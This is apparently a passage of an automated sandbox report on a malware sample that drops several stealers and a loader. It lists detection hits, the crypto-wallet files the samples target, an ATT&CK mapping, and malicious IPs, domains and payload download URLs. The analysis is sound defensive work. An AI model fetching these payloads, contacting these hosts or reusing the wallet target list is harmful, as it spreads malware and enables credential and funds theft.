                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: passphrase.json
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: \Ethereum\
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: exodus.conf.json
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: file__0.localstorage
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: Ethereum
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: default_wallet
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: \Exodus\exodus.wallet\
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: multidoge.wallet
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: seed.seco
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: keystore
                           Source: CFE8.exe, 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp String found in binary or memory: \Electrum-LTC\wallets\
                           Source: Yara match File source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: Process Memory Space: CFE8.exe PID: 4296, type: MEMORYSTR
                           Source: Yara match File source: Process Memory Space: FA5C.exe PID: 1496, type: MEMORYSTR

                          Remote Access Functionality:

                           Yara detected RedLine Stealer
                           Source: Yara match File source: 39.0.FA5C.exe.400000.6.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.0.FA5C.exe.400000.12.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.0.FA5C.exe.400000.4.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.0.FA5C.exe.400000.8.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.2.FA5C.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 21.2.FA5C.exe.3a8f910.1.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 21.2.FA5C.exe.3a8f910.1.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 39.0.FA5C.exe.400000.10.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 00000027.00000002.933081162.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000027.00000000.824314083.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000027.00000000.824767570.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000027.00000000.823843288.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000015.00000002.833273258.0000000003971000.00000004.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: 00000027.00000000.825252840.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                           Source: Yara match File source: dump.pcap, type: PCAP
                           Yara detected SmokeLoader
                           Source: Yara match File source: 16.2.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.0.sbxGIUIhRd.exe.400000.6.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.0.sbxGIUIhRd.exe.400000.4.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 16.0.95C6.exe.400000.4.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 10.1.adijaeg.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.0.sbxGIUIhRd.exe.400000.5.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.2.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 1.1.sbxGIUIhRd.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 13.2.95C6.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 16.0.95C6.exe.400000.6.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 9.2.adijaeg.5615a0.1.raw.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 16.1.95C6.exe.400000.0.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 16.0.95C6.exe.400000.5.unpack, type: UNPACKEDPE
                           Source: Yara match File source: 0.2.sbxGIUIhRd.exe.5615a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 10.2.adijaeg.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000000A.00000002.767064606.0000000000561000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719013921.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.921866016.0000000001F51000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000005.00000000.706607181.0000000004DC1000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787707490.0000000002051000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.719027443.00000000005A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000010.00000002.787566424.0000000002030000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.920736016.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000A.00000002.766964771.0000000000420000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 00000029.00000002.932916871.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000029.00000003.866964276.0000000004E90000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000012.00000002.778871372.0000000000873000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: CFE8.exe PID: 4296, type: MEMORYSTR
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 19.2.E2A6.exe.560e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.3.gaystiqf.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.3.E2A6.exe.580000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 19.2.E2A6.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 38.2.svchost.exe.2360000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 35.2.gaystiqf.exe.850000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000026.00000002.979557466.0000000002360000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809196350.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000003.805779040.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.808208197.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803426452.0000000000560000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000003.785124178.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000013.00000002.803137475.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000023.00000002.809631719.0000000000850000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: E2A6.exe PID: 4752, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: gaystiqf.exe PID: 4588, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 5288, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exeCode function: 19_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exeCode function: 35_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts1 | Scripting1 | DLL Side-Loading1 | DLL Side-Loading1 | Disable or Modify Tools211 | Input Capture1 | System Time Discovery2 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Web Service1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API531 | Valid Accounts1 | Valid Accounts1 | Deobfuscate/Decode Files or Information11 | LSASS Memory | Account Discovery1 | Remote Desktop Protocol | Data from Local System1 | Exfiltration Over Bluetooth | Ingress Tool Transfer15 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution1 | Windows Service14 | Access Token Manipulation1 | Scripting1 | Security Account Manager | File and Directory Discovery2 | SMB/Windows Admin Shares | Input Capture1 | Automated Exfiltration | Encrypted Channel22 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter3 | Logon Script (Mac) | Windows Service14 | Obfuscated Files or Information3 | NTDS | System Information Discovery227 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Non-Standard Port1 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Service Execution3 | Network Logon Script | Process Injection713 | Software Packing33 | LSA Secrets | Security Software Discovery551 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol5 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Timestomp1 | Cached Domain Credentials | Process Discovery2 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol36 | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | DLL Side-Loading1 | DCSync | Virtualization/Sandbox Evasion231 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion1 | Proc Filesystem | Application Window Discovery1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading131 | /etc/passwd and /etc/shadow | System Owner/User Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Valid Accounts1 | Network Sniffing | Remote System Discovery1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact
Compromise Software Dependencies and Development Tools | Windows Command Shell | Cron | Cron | Access Token Manipulation1 | Input Capture | Permission Groups Discovery | Replication Through Removable Media | Remote Data Staging | Exfiltration Over Physical Medium | Mail Protocols | | | Service Stop
Compromise Software Supply Chain | Unix Shell | Launchd | Launchd | Virtualization/Sandbox Evasion231 | Keylogging | Local Groups | Component Object Model and Distributed COM | Screen Capture | Exfiltration over USB | DNS | | | Inhibit System Recovery
Compromise Hardware Supply Chain | Visual Basic | Scheduled Task | Scheduled Task | Process Injection713 | GUI Input Capture | Domain Groups | Exploitation of Remote Services | Email Collection | Commonly Used Port | Proxy | | | Defacement
Trusted Relationship | Python | Hypervisor | Process Injection | Hidden Files and Directories1 | Web Portal Capture | Cloud Groups | Attack PC via USB Connection | Local Email Collection | Standard Application Layer Protocol | Internal Proxy | | | Internal Defacement

Behavior Graph

[Behavior graph: rendered as an interactive image on the original page; the node dump is omitted here.] Behavior Graph ID: 553170 | Sample: sbxGIUIhRd.exe | Startdate: 14/01/2022 | Architecture: WINDOWS | Score: 100

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
sbxGIUIhRd.exe | 36% | Virustotal |
sbxGIUIhRd.exe | 49% | ReversingLabs | Win32.Trojan.Generic
sbxGIUIhRd.exe | 100% | Joe Sandbox ML |

Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\gaystiqf.exe | 100% | Avira | TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\FA5C.exe | 100% | Avira | HEUR/AGEN.1211353
C:\Users\user\AppData\Local\Temp\8A6B.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\adijaeg | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\B3EB.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\96DB.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\CF17.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\CFE8.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\A15C.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\95C6.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\E2A6.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\BBBC.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\7D38.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\C487.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\gaystiqf.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\FA5C.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\7D38.exe | 34% | Metadefender |
C:\Users\user\AppData\Local\Temp\7D38.exe | 77% | ReversingLabs | Win32.Ransomware.StopCrypt

Unpacked PE Files

Source | Detection | Scanner | Label
18.3.CFE8.exe.650000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
39.2.FA5C.exe.ab0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
19.2.E2A6.exe.560e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
39.0.FA5C.exe.400000.12.unpack | 100% | Avira | HEUR/AGEN.1145065
21.0.FA5C.exe.530000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
39.0.FA5C.exe.ab0000.7.unpack | 100% | Avira | HEUR/AGEN.1211353
16.2.95C6.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.2.CFE8.exe.630e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
1.0.sbxGIUIhRd.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.8A6B.exe.590e50.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.FA5C.exe.400000.4.unpack | 100% | Avira | HEUR/AGEN.1145065
39.0.FA5C.exe.ab0000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
12.0.8A6B.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.FA5C.exe.400000.6.unpack | 100% | Avira | HEUR/AGEN.1145065
39.0.FA5C.exe.400000.8.unpack | 100% | Avira | HEUR/AGEN.1145065
1.0.sbxGIUIhRd.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1123244
9.2.adijaeg.5615a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
38.3.svchost.exe.284d000.3.unpack | 100% | Avira | TR/Patched.Gen
1.0.sbxGIUIhRd.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.2.FA5C.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1145065
35.2.gaystiqf.exe.630e50.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
13.2.95C6.exe.5615a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.2.8A6B.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.FA5C.exe.ab0000.9.unpack | 100% | Avira | HEUR/AGEN.1211353
35.3.gaystiqf.exe.650000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
16.0.95C6.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
19.3.E2A6.exe.580000.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
16.0.95C6.exe.400000.2.unpack | 100% | Avira | HEUR/AGEN.1123244
39.0.FA5C.exe.ab0000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
0.2.sbxGIUIhRd.exe.5615a0.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
18.2.CFE8.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.8A6B.exe.590e50.7.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
21.2.FA5C.exe.530000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
10.1.adijaeg.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.sbxGIUIhRd.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.0.sbxGIUIhRd.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1123244
1.0.sbxGIUIhRd.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1123244
19.2.E2A6.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
1.2.sbxGIUIhRd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
35.2.gaystiqf.exe.400000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
12.3.8A6B.exe.6f0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.0.adijaeg.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
12.0.8A6B.exe.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.FA5C.exe.ab0000.0.unpack | 100% | Avira | HEUR/AGEN.1211353
16.0.95C6.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1123244
10.0.adijaeg.400000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
1.1.sbxGIUIhRd.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.FA5C.exe.ab0000.11.unpack | 100% | Avira | HEUR/AGEN.1211353
21.0.FA5C.exe.530000.2.unpack | 100% | Avira | HEUR/AGEN.1211353
16.0.95C6.exe.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.FA5C.exe.ab0000.5.unpack | 100% | Avira | HEUR/AGEN.1211353
38.2.svchost.exe.2360000.0.unpack | 100% | Avira | BDS/Backdoor.Gen
1.0.sbxGIUIhRd.exe.400000.3.unpack | 100% | Avira | HEUR/AGEN.1123244
21.0.FA5C.exe.530000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
16.0.95C6.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1123244
10.0.adijaeg.400000.6.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.FA5C.exe.ab0000.1.unpack | 100% | Avira | HEUR/AGEN.1211353
12.2.8A6B.exe.590e50.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
39.0.FA5C.exe.400000.10.unpack | 100% | Avira | HEUR/AGEN.1145065
16.1.95C6.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
35.2.gaystiqf.exe.850000.2.unpack | 100% | Avira | BDS/Backdoor.Gen
21.0.FA5C.exe.530000.3.unpack | 100% | Avira | HEUR/AGEN.1211353
39.0.FA5C.exe.ab0000.13.unpack | 100% | Avira | HEUR/AGEN.1211353
38.3.svchost.exe.284d000.4.unpack | 100% | Avira | TR/Patched.Gen
16.0.95C6.exe.400000.5.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
10.2.adijaeg.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
16.0.95C6.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1123244

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
http://tempuri.org/Entity/Id12Response | 0% | URL Reputation | safe
http://185.7.214.171:8080/6.php | 100% | URL Reputation | malware
http://tempuri.org/ | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id2Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id21Response | 0% | URL Reputation | safe
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/cae3f8ed633c3e67f112fa91bf9f9a15abbe2944 | 0% | Avira URL Cloud | safe
http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | 13% | Virustotal |
http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | 0% | Avira URL Cloud | safe
http://185.163.204.24/ | 4% | Virustotal |
http://185.163.204.24/ | 0% | Avira URL Cloud | safe
http://tempuri.org/Entity/Id15Response | 0% | URL Reputation | safe
https://api.ip.sb/ip | 0% | URL Reputation | safe
http://81.163.30.181/1.exe | 100% | Avira URL Cloud | malware
http://tempuri.org/Entity/Id24Response | 0% | URL Reputation | safe
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | 100% | Avira URL Cloud | malware
http://tempuri.org/Entity/Id5Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id10Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id8Response | 0% | URL Reputation | safe
http://data-host-coin-8.com/game.exe | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id13Response | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id22Response | 0% | URL Reputation | safe
https://www.tiktok.com/legal/report/feedback | 0% | URL Reputation | safe
https://get.adob | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id18Response | 0% | URL Reputation | safe
http://185.215.113.35/d2VxjasuwS/plugins/cred.dll | 100% | Avira URL Cloud | malware
https://disneyplus.com/legal. | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id3Response | 0% | URL Reputation | safe
http://service.r | 0% | URL Reputation | safe
http://185.215.113.35/d2VxjasuwS/index.php | 0% | Avira URL Cloud | safe
http://tempuri.org/Entity/Id9 | 0% | URL Reputation | safe
http://tempuri.org/Entity/Id8 | 0% | URL Reputation | safe
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | 100% | Avira URL Cloud | malware

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
pool-fr.supportxmr.com | 149.202.83.171 | true | false | | high
unicupload.top | 54.38.220.85 | true | false | | high
host-data-coin-11.com | 8.209.70.0 | true | false | | high
patmushta.info | 94.142.143.116 | true | false | | high
cdn.discordapp.com | 162.159.135.233 | true | false | | high
privacy-tools-for-you-780.com | 8.209.70.0 | true | false | | high
microsoft-com.mail.protection.outlook.com | 104.47.54.36 | true | false | | high
goo.su | 172.67.139.105 | true | false | | high
transfer.sh | 144.76.136.153 | true | false | | high
data-host-coin-8.com | 8.209.70.0 | true | false | | high
pool.supportxmr.com | unknown | unknown | false | | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://185.7.214.171:8080/6.php | true | URL Reputation: malware | unknown
http://185.163.204.24//l/f/S2zKVH4BZ2GIX1a3NFPE/cae3f8ed633c3e67f112fa91bf9f9a15abbe2944 | true | Avira URL Cloud: safe | unknown
http://185.215.113.35/d2VxjasuwS/index.php?scr=1 | true | 13%, Virustotal; Avira URL Cloud: safe | unknown
http://185.163.204.24/ | true | 4%, Virustotal; Avira URL Cloud: safe | unknown
http://81.163.30.181/1.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/files/9030_1641816409_7037.exe | true | Avira URL Cloud: malware | unknown
http://data-host-coin-8.com/game.exe | false | URL Reputation: safe | unknown
http://185.215.113.35/d2VxjasuwS/plugins/cred.dll | true | Avira URL Cloud: malware | unknown
http://185.215.113.35/d2VxjasuwS/index.php | true | Avira URL Cloud: safe | unknown
http://data-host-coin-8.com/files/6961_1642089187_2359.exe | true | Avira URL Cloud: malware | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | FA5C.exe, 00000027.00000002.1016026617.00000000030C9000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.976385152.0000000003007000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1075583600.000000000321E000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
https://duckduckgo.com/ac/?q= | FA5C.exe, 00000027.00000002.1021158613.00000000030DF000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id12Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/ | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id2Response | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id21Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
https://support.google.com/chrome/?p=plugin_real | FA5C.exe, 00000027.00000002.978852970.000000000301D000.00000004.00000001.sdmp, FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://tempuri.org/Entity/Id15Response | FA5C.exe, 00000027.00000002.951781161.0000000002E61000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey | FA5C.exe, 00000027.00000002.953978581.0000000002EF4000.00000004.00000001.sdmp | false | | high
